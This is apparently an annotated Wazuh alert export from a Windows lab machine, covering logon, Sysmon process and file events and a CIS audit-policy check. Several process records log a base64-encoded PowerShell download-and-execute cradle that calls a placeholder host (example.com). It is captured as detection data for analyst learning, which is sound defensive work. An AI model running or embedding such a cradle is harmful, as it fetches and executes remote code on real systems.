data.win.eventdata.utcTime: 2025-04-24 22:40:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bddd-680a-d50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4ssfrd1y.lll.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534435.2092495 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:32.6880136Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43881 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 111 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534436.2099830 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:34.0647314Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286041 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:32.540
ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00}
ProcessId: 2532
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00}
ParentProcessId: 16696
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:32.540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde0-680a-d80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 115 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534436.2107897 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:34.2997910Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286042 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:34.252
ProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00}
ProcessId: 2532
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_twhlr5xs.n4e.ps1
CreationUtcTime: 2025-04-24 22:40:34.252
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:34.252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde0-680a-d80b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_twhlr5xs.n4e.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:34.252 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authentication Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534437.2110662 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26162 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Authentication Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Authentication Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authentication Policy Change"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 112 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534438.2114357 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:36.5211059Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286074 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:35.479
ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00}
ProcessId: 6708
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00}
ParentProcessId: 2532
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:35.479 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bde3-680a-db0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6708 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
